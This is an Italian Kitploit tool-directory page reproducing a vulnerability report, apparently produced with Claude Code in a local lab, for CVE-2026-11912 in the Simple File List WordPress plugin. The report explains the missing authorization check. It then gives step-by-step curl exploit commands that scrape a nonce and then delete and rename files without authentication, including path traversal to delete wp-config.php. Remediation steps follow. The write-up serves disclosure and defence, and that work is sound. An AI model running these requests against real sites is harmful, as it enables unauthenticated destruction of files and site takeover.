Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
By-Poloss..-..CVE-2026-11912 — Mancanza di Autorizzazione per Modifica di File Non Autenticata | Kitploit
Strumenti/GitHubGitHub/polosss/by-poloss..-..cve-2026-11912
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubpolosss/by-poloss..-..cve-2026-11912

By-Poloss..-..CVE-2026-11912

Mancanza di Autorizzazione per Modifica di File Non Autenticata

Vedi Repository
212 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-11912: Simple File List <= 6.3.7 - Autorizzazione Mancante per Modifica File Non Autenticata

Sintesi Esecutiva

CampoValore
CVE IDCVE-2026-11912
Punteggio CVSS7.5 (Alto)
Vettore CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Plugin AffettoSimple File List
Versioni Affette<= 6.3.7
Versione Corretta6.3.8
Pubblicato19 giugno 2026
RicercatoreChloe Chamberland - Wordfence
Ambiente di Laboratoriopoloss-lab.ddev.site (DDEV)

Dettagli della Vulnerabilità

Descrizione

Il plugin Simple File List per WordPress è vulnerabile a modifiche arbitrarie dei file a causa di controlli di autorizzazione insufficienti in tutte le versioni fino alla 6.3.7 inclusa. Ciò consente a utenti non autenticati di eliminare e modificare file sul server.

Analisi della Causa Radice

La vulnerabilità esiste per i seguenti motivi:

  1. Registrazione dell'Endpoint AJAX: L'azione AJAX simplefilelist_edit_job è registrata con entrambi gli hook wp_ajax_ e wp_ajax_nopriv_, consentendo l'accesso non autenticato:

    root@kitploit:~
    add_action('wp_ajax_simplefilelist_edit_job', 'simplefilelist_edit_job');
    add_action('wp_ajax_nopriv_simplefilelist_edit_job', 'simplefilelist_edit_job');
    
  2. Controllo di Autorizzazione Difettoso: La logica di autorizzazione in eeSFL_FileEditor() (riga 1265) utilizza:

    root@kitploit:~
    if(!is_admin() AND $eeSFL->eeListSettings['AllowFrontManage'] != 'YES') {
        return;
    }
    

    La funzione is_admin() restituisce FALSE per le richieste AJAX, causando un cortocircuito del controllo di autorizzazione prima che l'impostazione AllowFrontManage venga valutata.

  3. Esposizione del Nonce: Il nonce di sicurezza (eeSFL_ActionNonce) viene generato utilizzando wp_create_nonce() ed esposto nel codice sorgente HTML del frontend, consentendo agli attaccanti di estrarlo senza autenticazione.

Valutazione dell'Impatto

Impatto sulla Riservatezza: Alto

  • I contenuti dei file possono essere letti tramite l'elenco dei file
  • I metadati dei file sono esposti (nomi, dimensioni, date)

Impatto sull'Integrità: Alto (CRITICO)

  • Eliminazione dei file non autenticata
  • Rinomina dei file non autenticata
  • Modifica della descrizione dei file non autenticata
  • Path traversal consente l'eliminazione di file critici (incluso wp-config.php)

Impatto sulla Disponibilità: Nessuno

  • Le operazioni sui file non causano direttamente DoS, ma possono influenzare indirettamente la disponibilità tramite l'eliminazione dei file

Sfruttamento Reale Dimostrato

Durante i test, questa vulnerabilità è stata sfruttata con successo per ELIMINARE il file di configurazione di WordPress (wp-config.php), rompendo completamente il sito. Ciò dimostra la gravità critica dell'aspetto di path traversal di questa vulnerabilità.

Passaggi di Sfruttamento PoC

Step 1: Estrarre il Nonce dal Frontend

root@kitploit:~
# Get the security nonce from the file list page
curl -k -sL "https://poloss-lab.ddev.site/file-list/" | grep -o 'eeSFL_ActionNonce">[^<]*'
# Output: eeSFL_ActionNonce">1c14af78c2

Step 2: Eliminazione File Non Autenticata

root@kitploit:~
curl -k -s "https://poloss-lab.ddev.site/wp-admin/admin-ajax.php" -X POST \
  -d "action=simplefilelist_edit_job" \
  -d "eeSecurity=1c14af78c2" \
  -d "eeSFL_ID=1" \
  -d "eeFileAction=Delete" \
  -d "eeFileName=test.txt"
# Response: SUCCESS

Step 3: Rinomina File Non Autenticata

root@kitploit:~
curl -k -s "https://poloss-lab.ddev.site/wp-admin/admin-ajax.php" -X POST \
  -d "action=simplefilelist_edit_job" \
  -d "eeSecurity=1c14af78c2" \
  -d "eeSFL_ID=1" \
  -d "eeFileAction=Edit" \
  -d "eeFileName=original.pdf" \
  -d "eeFileNameNew=malicious.pdf"
# Response: SUCCESS

Step 4: Path Traversal (CRITICO - Eliminare wp-config.php)

root@kitploit:~
curl -k -s "https://poloss-lab.ddev.site/wp-admin/admin-ajax.php" -X POST \
  -d "action=simplefilelist_edit_job" \
  -d "eeSecurity=1c14af78c2" \
  -d "eeSFL_ID=1" \
  -d "eeFileAction=Delete" \
  -d "eeFileName=../../wp-config.php"
# Response: SUCCESS (CRITICAL - This breaks the site!)

Rimedio

Azioni Immediate

  1. Aggiornare il Plugin: Aggiornare a Simple File List versione 6.3.8 o superiore
  2. Verificare la Compromissione: Controllare il filesystem per modifiche non autorizzate
  3. Ripristinare i Backup: Se wp-config.php è stato compromesso, ripristinare da backup

Mitigazioni Temporanee (se l'aggiornamento non è immediatamente possibile)

  1. Disabilitare il plugin Simple File List fino alla correzione
  2. Rimuovere tutte le pagine che contengono lo shortcode [eeSFL]
  3. Implementare regole WAF per bloccare richieste AJAX sospette:
    root@kitploit:~
    # Block simplefilelist_edit_job AJAX calls
    <IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteCond %{QUERY_STRING} action=simplefilelist_edit_job
        RewriteRule ^wp-admin/admin-ajax\.php$ - [F,L]
    </IfModule>
    

Raccomandazioni a Lungo Termine

  • Implementare la validazione dell'origine della richiesta (protezione CSRF)
  • Aggiungere controlli delle capacità per tutte le operazioni sui file
  • Limitare la frequenza degli endpoint AJAX
  • Monitorare i log per operazioni sospette sui file

Riferimenti

  • Wordfence Intelligence
  • Pagina del Plugin Simple File List
  • Trunk SVN del Plugin

Ambiente di Test

  • Laboratorio: DDEV poloss-lab
  • URL: https://poloss-lab.ddev.site
  • Versione del Plugin Testata: 6.3.7
  • Versione di WordPress: Ultima (PHP 8.4)

Report generato da Claude Code - Laboratorio di Test di Sicurezza WordPress Data: 20 giugno 2026

Scarica lo strumento